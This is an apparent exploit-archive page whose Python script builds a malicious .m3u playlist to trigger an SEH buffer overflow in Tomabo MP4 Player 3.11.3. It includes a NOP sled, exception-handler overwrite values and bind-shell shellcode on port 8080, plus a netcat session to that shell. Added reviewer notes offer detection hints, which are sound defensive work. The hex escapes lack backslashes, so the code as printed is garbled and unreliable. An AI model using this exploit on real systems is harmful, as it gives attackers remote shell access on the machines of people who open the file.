Tomabo MP4 Player 3.11.3 SEH Buffer Overflow
Posted on 09 August 2015
#!/usr/bin/python
# Exploit Title: Tomabo MP4 Player 3.11.3 - (.m3u) SEH Buffer Overflow
# Date: 03/08/2015
# Exploit Author: Saeid Atabaki
# E-Mail: bytecod3r <at> gmail.com, saeid <at> Nsecurity.org
# Linkedin: https://www.linkedin.com/in/saeidatabaki
# Vendor Homepage: http://tomabo.com/mp4-player/index.html
# Version: 3.11.3
# Tested on: Windows XP SP3
#---------------------------------------------------------------------#
# Badchars: "x00x0ax0dx0cx20x09x1a"'
#
# nc 192.168.11.136 8080
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:Documents and SettingsAdministratorDesktop>
#---------------------------------------------------------------------#
#
# Reviewer notes (defensive reading of this proof of concept):
# - The script only builds a playlist file. The overflow named in the title
#   happens when the affected player (version 3.11.3 per the header) parses
#   that file, so the exposure is users opening untrusted .m3u files.
# - The transcript above shows a command prompt reached over TCP 8080 on the
#   author's test host, matching the "bind shell port 8080" comment below.
#   An unexpected listener on that port owned by a media-player process is
#   a usable detection signal.
# - Only Windows XP SP3 is listed as tested. Whether SEHOP, SafeSEH, DEP or
#   ASLR on later Windows builds stop this technique is not shown on the
#   page -- TODO confirm per build.
# - A normal .m3u holds short text lines of paths or URLs. A file that is a
#   single run of more than a thousand bytes with no playlist entries is
#   anomalous and can be flagged by content inspection.
# - Every string literal below is reproduced exactly as it appears on the
#   page; nothing has been re-encoded or validated.

import sys
import struct

# Name of the playlist file the script writes into the working directory.
out_path = "crash.m3u"

# Windows bind shell port 8080, feel free to swap shellcode
# The chunks are joined in page order into the single string `sc`.
sc = "".join((
    "xddxc1xd9x74x24xf4xb8xd3x4bxb2xa4x5dx31",
    "xc9xb1x53x31x45x17x83xc5x04x03x96x58x50",
    "x51xe4xb7x16x9ax14x48x77x12xf1x79xb7x40",
    "x72x29x07x02xd6xc6xecx46xc2x5dx80x4exe5",
    "xd6x2fxa9xc8xe7x1cx89x4bx64x5fxdexabx55",
    "x90x13xaax92xcdxdexfex4bx99x4dxeexf8xd7",
    "x4dx85xb3xf6xd5x7ax03xf8xf4x2dx1fxa3xd6",
    "xccxccxdfx5exd6x11xe5x29x6dxe1x91xabxa7",
    "x3bx59x07x86xf3xa8x59xcfx34x53x2cx39x47",
    "xeex37xfex35x34xbdxe4x9exbfx65xc0x1fx13",
    "xf3x83x2cxd8x77xcbx30xdfx54x60x4cx54x5b",
    "xa6xc4x2ex78x62x8cxf5xe1x33x68x5bx1dx23",
    "xd3x04xbbx28xfex51xb6x73x97x96xfbx8bx67",
    "xb1x8cxf8x55x1ex27x96xd5xd7xe1x61x19xc2",
    "x56xfdxe4xedxa6xd4x22xb9xf6x4ex82xc2x9c",
    "x8ex2bx17x08x86x8axc8x2fx6bx6cxb9xefxc3",
    "x05xd3xffx3cx35xdcxd5x55xdex21xd6x46x8f",
    "xafx30x12xbfxf9xebx8ax7dxdex23x2dx7dx34",
    "x1cxd9x36x5ex9bxe6xc6x74x8bx70x4dx9bx0f",
    "x61x52xb6x27xf6xc5x4cxa6xb5x74x50xe3x2d",
    "x14xc3x68xadx53xf8x26xfax34xcex3ex6exa9",
    "x69xe9x8cx30xefxd2x14xefxccxddx95x62x68",
    "xfax85xbax71x46xf1x12x24x10xafxd4x9exd2",
    "x19x8fx4dxbdxcdx56xbex7ex8bx56xebx08x73",
    "xe6x42x4dx8cxc7x02x59xf5x35xb3xa6x2cxfe",
    "xc3xecx6cx57x4cxa9xe5xe5x11x4axd0x2ax2c",
    "xc9xd0xd2xcbxd1x91xd7x90x55x4axaax89x33",
    "x6cx19xa9x11",
))

# File contents, in order: 1028 repeats of a filler unit, two fixed fields,
# 20 more filler repeats, then `sc`. Given the title, the two fixed fields
# presumably line up with the two members of the overwritten exception
# record -- inferred from the title, not established by the page.
payload = "".join((
    "x90" * 1028,
    "xebx18x90x90",
    "x69x9ex48x00",
    "x90" * 20,
    sc,
))

# Text-mode write of the assembled string; the handle is closed explicitly.
handle = open(out_path, "w")
handle.write(payload)
handle.close()